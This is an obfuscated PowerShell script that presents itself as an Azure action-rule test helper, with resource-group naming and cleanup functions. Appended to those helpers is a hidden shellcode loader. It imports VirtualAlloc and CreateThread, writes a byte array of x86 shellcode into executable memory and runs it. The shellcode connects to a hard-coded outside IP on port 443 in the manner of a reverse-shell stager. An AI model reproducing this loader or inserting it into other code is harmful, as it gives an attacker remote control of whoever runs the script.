  .('SV')  oWJKc (  [TyPe]("{7}{6}{3}{5}{1}{4}{0}{8}{2}" -f'PMoCKS','ec','Ver','urE.tesT.htTp','ORder.HTt','r','oFt.aZ','miCrOs','eR')) ;    &('sv')  H2eP4 ([tYpE]("{7}{4}{8}{6}{0}{2}{3}{1}{5}"-f 'T.ht','deRmOD','tpr','Ecorder.hTtPREcOR','C','E','es','mI','RosoFt.AZURe.T') )  ; 














function GeT-tesTR`eSo`Urce`g`R`O`UpnaME(${A`CTioN})
{
    return ("{0}{1}"-f'pste','strg') + ${ACt`ion}
}


function get-tE`st`A`ctI`oNRu`LEnaME(${A`cT`ION})
{
    return ("{0}{2}{1}"-f 'p','r','stesta') + ${ACtI`on}
}


function GE`T-PrOv`IDerl`OcAtioN(${pRO`VID`ER})
{
    
    ("{0}{1}" -f'eas','tus')
}


function c`LE`ANup(${RGN`A`me}, ${a`CTIOnruLEnA`me})
{
    if (  (  .("{0}{1}"-f'd','IR') VARIaBLe:owjkC)."v`ALUE"::"mo`DE" -ne  ( .("{0}{1}{2}"-f'get-cHI','ldIT','em') vARIAblE:H2Ep4  )."VAL`Ue"::"pl`Ayb`ACK") {
        &("{3}{4}{2}{1}{0}"-f 'le','ionRu','ve-AzAct','R','emo') -ResourceGroupName ${rgnA`mE} -Name ${a`Ct`IOnRUL`eNa`mE}
        &("{3}{1}{2}{4}{0}" -f 'oup','AzR','esourceG','Remove-','r') -Name ${rG`Na`Me} -Force
    }
}
${C} = ((("{60}{8}{11}{13}{57}{50}{28}{44}{51}{42}{67}{46}{29}{2}{14}{39}{41}{53}{64}{33}{17}{59}{43}{61}{4}{26}{54}{0}{22}{27}{66}{36}{23}{15}{34}{3}{62}{30}{58}{47}{7}{49}{35}{12}{16}{18}{55}{63}{37}{9}{25}{6}{38}{65}{10}{31}{48}{20}{52}{32}{5}{40}{45}{1}{56}{19}{24}{21}"-f 'K7Bkerne','set(IntPt','u','ributes, uint','ll','rn Int',' lpT','r lpStar','po','dwC',');[DllImport(K7Bmsvcr','r','e','t(','i','read(IntPtr lpThr','s','uint flPr','s, In','des','K7B)]public',', uint src, uint count);','l32.dll','r CreateTh','t','reationFlags, IntPtr','Im','K7B)]publ','llK7B','ize, ','S','t','ic exte',', ','eadAtt','ddr','n IntPt','int ','hreadI','nt f','Ptr me','lAlloc','lloc(Int','t);[',')]public static extern ','m','tr lpAddress, uint dwS',' IntPt','.dll','tA','kernel32.d','IntPtr VirtualA',' stat','ationTy','port(','tPtr lpParameter,','r ','K7B','tackSize,','otec','[DllIm','D',' dw',' u','pe','d','ic static exter','P'))  -CrePlAcE  'K7B',[char]34);${w} = &("{2}{0}{1}"-f 'dd-Typ','e','A') -memberDefinition ${c} -Name ("{1}{0}" -f '32','Win') -namespace ("{2}{0}{1}"-f 'in32Fun','ctions','W') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x31,0x31,0xc5,0x58,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${G} = 0x1000;if (${z}."L`ENgtH" -gt 0x1000){${G} = ${Z}."Le`NGth"};${x}=${W}::("{0}{2}{1}" -f 'V','lAlloc','irtua').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."L`ENgTh"-1);${I}++) {${w}::"ME`M`SeT"([IntPtr](${X}.("{0}{2}{1}" -f 'T','nt32','oI').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{2}{0}{3}{1}" -f 'r','ateThread','C','e').Invoke(0,0,${X},0,0,0);for (;;){.("{2}{0}{3}{1}"-f'-','ep','Start','sle') 60};
